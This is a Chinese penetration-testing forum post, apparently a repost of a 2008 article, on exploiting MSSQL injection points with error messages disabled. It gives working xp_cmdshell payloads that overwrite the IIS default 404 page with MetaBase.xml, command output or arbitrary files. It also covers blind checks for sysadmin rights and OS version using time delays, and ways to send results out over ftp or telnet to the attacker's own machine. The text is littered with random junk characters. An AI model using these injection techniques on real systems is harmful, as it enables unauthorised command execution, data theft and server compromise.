中国网络渗透测试联盟

标题: 28度的冰注入技巧之(一)——404页面的妙用 [打印本页]
作者: admin    时间: 2012-9-15 14:15
标题: 28度的冰注入技巧之(一)——404页面的妙用
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。/ S' {* O3 h2 c* e  ^/ c

4 X9 N4 s: r; d+ ]' `2 V) ?# S  虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
; e; n. T1 x1 Y7 s; j2 {9 k! E9 U) f% u9 V6 a
  这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。  Y* S- F$ a! f  W

. H+ a0 a# M! t  s1 d  IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
/ K4 m- |% F& y, [# H! V6 n4 Q9 m
  得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--# ]! {7 B6 r" d* j; j
  p4 c: e: Q4 d6 L  E; b0 U
  ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
) J/ u3 L! W5 C" G- \$ p
/ I2 ?: p$ B# \2 J) T  执行命令得到回显
6 x( ^/ H! o$ I/ Y. ?  V) y0 E5 O/ |* U- Z
  通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--1 Z8 w% U# o5 q9 r# V

; X# @; X  A% M" J  得到文件也shi相同,把文件copy到404b.htm就行了
5 T- C0 l9 _8 F1 B( G! f6 P$ o& l6 p7 ~1 l7 }) |3 R2 O
  by 28ice, 2008/6/26& g, n/ U; S2 R& j. F; {  u

7 f9 h" [& y! q8 z' R  摘自 28度的冰) I$ s# l1 ?! \5 ^5 p
: `6 x8 o- I3 [  L4 B% \6 a  O
  盲注判断权限和操作系统版本
% [6 b& _9 R0 t* E: d8 i( g6 o
1 w! J( G, q" B0 ]% n5 B% n  首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?
- k$ S1 Y: b. B; p6 l6 ^$ n# K
2 p$ U. {+ m/ O! M2 d4 y1 K8 ]  最简单的,可能以用这样的方法:% {1 ?) N# b) e0 w) g

% s7 B' y; B) ]' M! g  1=(select IS_SRVROLEMEMBER(’sysadmin’))
  u4 f( v9 P9 I# J" S6 V8 b$ s; l, B+ ^+ l/ [7 ]% N
  当然,有些情况下,这个方法并不奏效。
% l# |# E$ `$ \0 @! C  p& R/ L$ U
  既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。. f" k2 b$ n( K3 C$ o
: k3 _  _" b9 e% [  U. {
  有个3办法可能以解决这个问题
" P; ]3 M) K4 l$ ]; q
& `& p  S% c: i* m  a.把执行结果写到404b.htm,具体请看我的上一篇文章8 j; ~2 l, v. B, e
. {& t! Y0 t3 Y" y4 m8 c; R' t
  b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
# d( {* U. v. b" y: K2 D4 b3 e$ k  L2 ^% G& g% k1 c: g
  c.如果1433端口可能以连接,那干脆新建个sql登录: v/ x, p$ n# j3 j& z' e4 M

4 n& c7 W( r) z6 d  d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
, L! h" G$ G/ }( g$ u, s+ |5 y. F. G% h0 T4 w6 `& X
  还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
. o8 f* e' ]5 A# W* `& C" v7 j
- Z9 I- F' X; N' \  u5 x: D6 ]$ S  很简单
' @: P2 k4 S( _/ n  d' @
2 L) R2 v% E: ~; E/ r5 S- U5 S  执行systeminfo
/ A2 K$ l. I0 G$ V  j/ @9 \5 c/ t- o
  在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2